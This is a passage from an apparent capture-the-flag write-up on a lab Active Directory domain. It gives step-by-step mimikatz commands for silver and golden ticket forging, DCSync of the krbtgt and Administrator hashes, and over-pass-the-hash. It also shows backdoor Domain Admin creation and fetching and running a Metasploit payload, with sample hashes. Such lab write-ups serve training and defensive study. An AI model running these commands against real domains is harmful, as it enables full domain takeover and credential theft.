Then it was just a matter of assembling the pieces. To DCSync the krbtgt hash, the forged ticket had to target the LDAP service of the DC. The user name and RID can be anything: mimikatz puts the default privileged groups (512, 513, 518, 519, 520) in the forged PAC, and the DC trusts it because the ticket is encrypted with the DC$ key. Note that the DC$ hash below differs from the one dumped from the backup; computer account passwords rotate, which is exactly what broke this path during the event.

DC$ NTLM: fffbe1d239fff71c6fb5c2996def0f8e
Domain SID: S-1-5-21-2892396748-947681171-1598779583
Domain Name: neurosoft.ctf
Service: LDAP
User: whatever
ID: whatever

Then, with mimikatz, the ticket could be forged, injected and used to pull the krbtgt secret from the DC:

mimikatz # kerberos::golden /admin:IPWNEDYOU /id:1106 /domain:neurosoft.ctf /sid:S-1-5-21-2892396748-947681171-1598779583 /target:dc.neurosoft.ctf /rc4:fffbe1d239fff71c6fb5c2996def0f8e /service:LDAP /ptt
mimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:krbtgt

From the silver ticket, the player could escalate to a golden ticket, since the krbtgt key signs every TGT in the domain.

krbtgt NTLM: dd7a591aa181dc43ed2f6a509411c95f
Domain SID: S-1-5-21-2892396748-947681171-1598779583
Domain Name: neurosoft.ctf
User: whatever
ID: whatever

Then with mimikatz (RID 500 is the built-in Administrator, but any name and RID will do, for the same reason as above):

mimikatz # kerberos::golden /domain:neurosoft.ctf /sid:S-1-5-21-2892396748-947681171-1598779583 /rc4:dd7a591aa181dc43ed2f6a509411c95f /user:GetRekt /id:500 /ptt

mimikatz # exit

Grab a flag on DC

The DC$ machine account, even though it belongs to the DC itself, is not an administrator of the DC: the stolen TGT alone does not grant access to \\dc.neurosoft.ctf\c$.

C:\temp>klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: DC$ @ NEUROSOFT.CTF
        Server: krbtgt/NEUROSOFT.CTF @ NEUROSOFT.CTF
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 10/15/2019 23:17:09 (local)
        End Time:   10/16/2019 9:17:09 (local)
        Renew Time: 10/22/2019 23:17:09 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

C:\temp>dir \\dc.neurosoft.ctf\c$
Access is denied.

PTH again and again…

# Get Administrator's account hash
mimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:Administrator
...
* Primary:Kerberos-Newer-Keys *
    Default Salt : NEUROSOFT.CTFAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9
      aes128_hmac       (4096) : f645bbe57528cd1a95bf06779dcc98b3
      des_cbc_md5       (4096) : a2b92a85641ce0c7
...

# Spawn a shell with PTH (over-pass-the-hash: the AES256 key is injected into a new
# logon session, which obtains a genuine TGT for Administrator on first Kerberos use)
mimikatz # sekurlsa::pth /user:Administrator /domain:neurosoft.ctf /aes256:74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9 /run:payload_msf_x64.exe

## Switch to the new session
# Grab the flag
C:\temp>dir \\dc.neurosoft.ctf\c$
C:\temp>type \\dc.neurosoft.ctf\c$\flag.txt

Pop dc.neurosoft.ctf

Windows Server 2016's defaults are fairly locked down, and in this environment none of the usual psexec- and WMI-based tricks worked against the DC. The simplest approach at this point was to create a Domain Admin account and use RDP for the rest. (From a defender's point of view this is also the noisiest option: it leaves 4720 and 4728 events on the DC.)

C:\temp>net user mdube FuckWindows1 /add /domain
C:\temp>net group "Domain Admins" mdube /add /domain

# Log in over RDP, then fetch the payload from dev and run it
C:\temp>net use \\dev.neurosoft.ctf\c$
C:\temp>copy \\dev.neurosoft.ctf\c$\temp\payload_msf_x64.exe .\
C:\temp>.\payload_msf_x64.exe

Status at this point